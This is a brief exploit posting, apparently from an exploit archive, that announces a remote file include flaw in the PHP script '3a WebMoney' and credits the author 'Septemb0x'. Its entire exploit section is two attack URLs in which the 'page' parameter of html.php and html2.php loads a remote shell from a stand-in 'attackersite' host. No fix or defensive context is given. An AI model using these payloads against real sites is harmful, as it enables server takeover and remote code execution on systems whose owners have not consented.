< ------------------- header data start ------------------- >
#############################################################
# Application Name : 3a WebMoney
# Vulnerable Type : Remote File Include Vulnerability
# author : Septemb0x
# Script Down.& WebSite : http://s2.dosya.tc/3aWebMoney.rar.html & http://www.mestkom.ru/asp/pay.asp?id_d=14795
#############################################################
< ------------------- header data end of ------------------- >
< -- bug code start -- >
EXPLOIT :
1. http://sitename/path/html.php?page=http://attackersite/shell.php
2. http://sitename/path/html2.php?page=http://attackersite/shell.php
< -- bug code end of -- >